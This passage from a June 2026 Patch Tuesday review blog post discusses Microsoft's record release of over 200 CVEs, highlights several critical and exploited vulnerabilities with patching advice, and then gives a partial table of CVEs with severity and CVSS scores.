  <p class="">Obviously, the update for Campaign Classic should be on the top of your deployment list if you’re a user. A CVSS 10 is rare; two in the same bulletin is pretty much a unicorn. Adobe says there are no active attacks, but I would expect heavy research into creating one. The update for Coldfusion is also a Priority 1, but again, no known attacks is the wild. I suspect the Reader patch will also receive a lot of attention as malicious PDFs are common in ransomware attacks. The update for Experience Manager may be large, but it’s mostly just cross-site scripting (XSS) bugs.</p><p class=""><strong>Microsoft Patches for June 2026</strong></p><p class="">This month, Microsoft released a new record 208 CVEs Windows and Windows components, Office and Office Components, Microsoft Edge (Chromium-based), Azure, .NET and Visual Studio, Github Copilot, Defender, Exchange Server, Hyper-V, Secure Boot, and BitLocker. At least, that’s my count. Microsoft’s tools seem to be having some issues, as they initially included a CVE from 2020 in this release. Regardless, the count is over 200, and I counted several times.</p><p class="">One of these bugs came through the ZDI program, but bugs submitted during Pwn2Own Berlin remain unpatched. If you include the Chromium and other third-party bugs, the total CVE count for June comes to a staggering 571 CVEs. 38 of these cases are rated Critical while the rest are rated Important in severity.</p><p class="">I’ve been counting CVEs on Patch Tuesday since 2017, and this is by far the largest monthly release in that time. The previous record was 177 set last year. It is extraordinary that Microsoft can produce so many patches in a single month, but it does raise concerns. How many of these cases were found using AI tools? How many patches were generated using AI to assist in coding or testing? What quality issues may exist in these patches? And likely most importantly, is this the new normal? The last two months were also large releases. Should sysadmins adjust their processes for prioritization and patch deployment based on this new volume of updates? Unfortunately, Microsoft is not providing those answers right now. Hopefully that changes in the future. BTW – just a note – the current number of CVEs shipped by Microsoft this year exceeds the total number of CVEs shipped in all of 2018.</p><p class="">One of the bugs patched by Microsoft this month is listed as under active exploitation and three others are listed as publicly known at the time of release. Let’s take a closer look at some of the more interesting updates for this month, starting with the bug being exploited in the wild.</p><p class="">-   <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41091"><strong>CVE-2026-41091</strong></a><strong> - Microsoft Defender Elevation of Privilege Vulnerability<br></strong>Since Microsoft doesn’t provide info on how widespread exploitation is, we must read some tea leaves. For this patch, several different people were acknowledged, which indicates multiple parties say this is in the wild, meaning exploitation is likely significant. The good news is that most people won’t need to take action as Defender updates itself. However, if you don’t have this configured or are in an isolated environment, you’ll need to update to the latest version.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45657"><strong>CVE-2026-45657</strong></a><strong> - Windows Kernel Remote Code Execution Vulnerability<br></strong>This CVSS 9.8 bug allows remote, unauthenticated attackers to execute code at SYSTEM level without user interaction. Yup – this is wormable. The problem lies in the way the kernel handles TCP/IP. This was listed as “Exploitation Less Likely” by Microsoft, but rest assured that every researcher and bug shop on the planet is reversing this patch right now trying to create an exploit. Test and deploy this patch quickly.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47291"><strong>CVE-2026-47291</strong></a><strong> - HTTP.sys Remote Code Execution Vulnerability<br></strong>Our second CVSS 9.8 bug of the month, this also allows remote, unauthenticated attackers to execute code on affected systems without user interaction. However, there is a caveat. Systems using the default MaxRequestBytes registry value used by the Windows HTTP stack are not affected by this bug. You can edit your registry settings if you need protection while you test and deploy the patch. The bulletin includes instructions and even a PowerShell script for doing this action. Microsoft lists this as “Exploitation more likely”, so I would definitely check your registry settings.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44815"><strong>CVE-2026-44815</strong></a><strong> - DHCP Client Service Remote Code Execution Vulnerability<br></strong>Here’s another CVSS 9.8 that has an odd incongruity. Although the CVSS says no permissions are required for exploitation, the write-up states it must be an “authenticated” user. I would err on the side of caution here and believe the CVSS. If that’s correct, then we have another bug where a remote, unauthenticated attacker could execute code on affected systems without user interaction. And since the DHCP client is on every OS, it’s a juicy target. This is another one to test and deploy with haste.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45585"><strong>CVE-2026-45585</strong></a><strong>/</strong><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50507"><strong>CVE-2026-50507</strong></a><strong> - Windows BitLocker Security Feature Bypass Vulnerability<br></strong>If you’ve followed the ongoing saga of Nightmare Eclipse vs. MSRC, the bugs should look familiar. One is definitely a fix for “YellowKey”, while the other appears to be a fix for “GreenPlasma”. The researcher has promised a “<a href="https://www.theregister.com/security/2026/05/28/microsoft-0-day-feud-escalates-as-researcher-threatens-another-windows-exploit-dump/5248085">bone shattering</a>” drop on June 14, so let’s hope Microsoft is able to reach some understanding with the researcher before more 0-days are released. Also, there is a script provided by Microsoft as a mitigation, but the better strategy is to test and deploy the updates.</p><p class=""> Here’s the full list of CVEs released by Microsoft for June 2026:</p>





















  
  




  
    





<link rel="File-List" href="new2026-Jun-cvrf.fld/filelist.xml">













<table border="0" cellpadding="0" cellspacing="0" width="1024">
 <col width="144">
 <col width="256">
 <col width="104" span="6">
 <tr height="47">
  <td width="144" class="xl65" height="47">CVE</td>
  <td width="256" class="xl65">Title</td>
  <td width="104" class="xl66">Severity</td>
  <td width="104" class="xl66">CVSS</td>
  <td width="104" class="xl66">Public</td>
  <td width="104" class="xl66">Exploited</td>
  <td width="104" class="xl66">XI</td>
  <td width="104" class="xl66">Type</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41091"><span>CVE-2026-41091</span></a></td>
  <td width="256" class="xl68">Microsoft Defender
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl71">Yes</td>
  <td class="xl71">Yes</td>
  <td class="xl70">0</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49160"><span>CVE-2026-49160</span></a></td>
  <td width="256" class="xl68">HTTP.sys Denial of
  Service Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.5</td>
  <td class="xl71">Yes</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50507"><span>CVE-2026-50507</span></a></td>
  <td width="256" class="xl68">Windows BitLocker
  Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.8</td>
  <td class="xl71">Yes</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45586"><span>CVE-2026-45586</span></a></td>
  <td width="256" class="xl68">Windows Collaborative
  Translation Framework (CTFMON) Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl71">Yes</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="91">
  <td class="xl67" height="91"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-10263"><span>CVE-2025-10263 *</span></a></td>
  <td width="256" class="xl68">ARM: CVE-2025-10263
  Completion of affected memory accesses might not be guaranteed by completion
  of a TLBI [kernel]</td>
  <td class="xl72">Critical</td>
  <td class="xl70">9.3</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48567"><span>CVE-2026-48567</span></a></td>
  <td width="256" class="xl68">Azure HorizonDB<span>  </span>Elevation of Privilege Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">10</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">N/A</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32193"><span>CVE-2026-32193</span></a></td>
  <td width="256" class="xl68">Azure Kubernetes
  Service (AKS) Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47644"><span>CVE-2026-47644</span></a></td>
  <td width="256" class="xl68">Copilot Chat
  (Microsoft Edge) Information Disclosure Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44815"><span>CVE-2026-44815</span></a></td>
  <td width="256" class="xl68">DHCP Client Service
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">9.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47291"><span>CVE-2026-47291</span></a></td>
  <td width="256" class="xl68">HTTP.sys Remote Code
  Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">9.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42824"><span>CVE-2026-42824</span></a></td>
  <td width="256" class="xl68">M365 Copilot
  Information Disclosure Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">N/A</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45476"><span>CVE-2026-45476</span></a></td>
  <td width="256" class="xl68">Microsoft Azure
  Network Adapter Elevation of Privilege Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.2</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44810"><span>CVE-2026-44810</span></a></td>
  <td width="256" class="xl68">Microsoft
  Cryptographic Services Elevation of Privilege Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48579"><span>CVE-2026-48579</span></a></td>
  <td width="256" class="xl68">Microsoft Exchange
  Online Information Disclosure Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">9.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">N/A</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47655"><span>CVE-2026-47655</span></a></td>
  <td width="256" class="xl68">Microsoft Graph
  Information Disclosure Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">N/A</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45497"><span>CVE-2026-45497</span></a></td>
  <td width="256" class="xl68">Microsoft M365 Copilot
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">N/A</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45460"><span>CVE-2026-45460</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Information Disclosure Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">4.7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45472"><span>CVE-2026-45472</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45474"><span>CVE-2026-45474</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45461"><span>CVE-2026-45461</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45463"><span>CVE-2026-45463</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45456"><span>CVE-2026-45456</span></a></td>
  <td width="256" class="xl68">Microsoft Outlook and
  Word Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45458"><span>CVE-2026-45458</span></a></td>
  <td width="256" class="xl68">Microsoft Outlook and
  Word Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47635"><span>CVE-2026-47635</span></a></td>
  <td width="256" class="xl68">Microsoft Outlook and
  Word Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26142"><span>CVE-2026-26142</span></a></td>
  <td width="256" class="xl68">Nuance PowerScribe
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">9.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47289"><span>CVE-2026-47289</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47654"><span>CVE-2026-47654</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48563"><span>CVE-2026-48563</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42992"><span>CVE-2026-42992</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44799"><span>CVE-2026-44799</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44801"><span>CVE-2026-44801</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42985"><span>CVE-2026-42985</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45648"><span>CVE-2026-45648</span></a></td>
  <td width="256" class="xl68">Windows Active
  Directory Domain Services Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42987"><span>CVE-2026-42987</span></a></td>
  <td width="256" class="xl68">Windows Deployment
  Services (WDS) Remote Code Execution</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33828"><span>CVE-2026-33828</span></a></td>
  <td width="256" class="xl68">Windows Device Health
  Attestation (DHA) Elevation of Privilege Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44803"><span>CVE-2026-44803</span></a></td>
  <td width="256" class="xl68">Windows Graphics
  Component Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44812"><span>CVE-2026-44812</span></a></td>
  <td width="256" class="xl68">Windows Graphics
  Component Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45607"><span>CVE-2026-45607</span></a></td>
  <td width="256" class="xl68">Windows Hyper-V Remote
  Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45641"><span>CVE-2026-45641</span></a></td>
  <td width="256" class="xl68">Windows Hyper-V Remote
  Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47652"><span>CVE-2026-47652</span></a></td>
  <td width="256" class="xl68">Windows Hyper-V Remote
  Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.2</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47288"><span>CVE-2026-47288</span></a></td>
  <td width="256" class="xl68">Windows Kerberos Key
  Distribution Center (KDC) Remote Code Execution</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45657"><span>CVE-2026-45657</span></a></td>
  <td width="256" class="xl68">Windows Kernel Remote
  Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">9.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48574"><span>CVE-2026-48574</span></a></td>
  <td width="256" class="xl68">Windows Media Remote
  Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45490"><span>CVE-2026-45490</span></a></td>
  <td width="256" class="xl68">.NET SDK Elevation of
  Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45491"><span>CVE-2026-45491</span></a></td>
  <td width="256" class="xl68">.NET Tampering
  Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.2</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Tampering</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45591"><span>CVE-2026-45591</span></a></td>
  <td width="256" class="xl68">ASP.NET Core Denial of
  Service Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47643"><span>CVE-2026-47643</span></a></td>
  <td width="256" class="xl68">Azure Stack Edge
  Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">9.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41098"><span>CVE-2026-41098</span></a></td>
  <td width="256" class="xl68">Azure Stack Edge
  Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45642"><span>CVE-2026-45642</span></a></td>
  <td width="256" class="xl68">Microsoft Azure
  Attestation service and Device Health Attestation Service Spoofing
  Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">3.9</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45650"><span>CVE-2026-45650</span></a></td>
  <td width="256" class="xl68">Microsoft Bing Search
  Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">4.3</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45637"><span>CVE-2026-45637</span></a></td>
  <td width="256" class="xl68">Microsoft DWM Core
  Library Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45647"><span>CVE-2026-45647</span></a></td>
  <td width="256" class="xl68">Microsoft Defender for
  Endpoint for Mac Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40371"><span>CVE-2026-40371</span></a></td>
  <td width="256" class="xl68">Microsoft Dynamics 365
  (on-premises) Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44822"><span>CVE-2026-44822</span></a></td>
  <td width="256" class="xl68">Microsoft Excel
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.2</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45455"><span>CVE-2026-45455</span></a></td>
  <td width="256" class="xl68">Microsoft Excel
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">3.3</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45469"><span>CVE-2026-45469</span></a></td>
  <td width="256" class="xl68">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
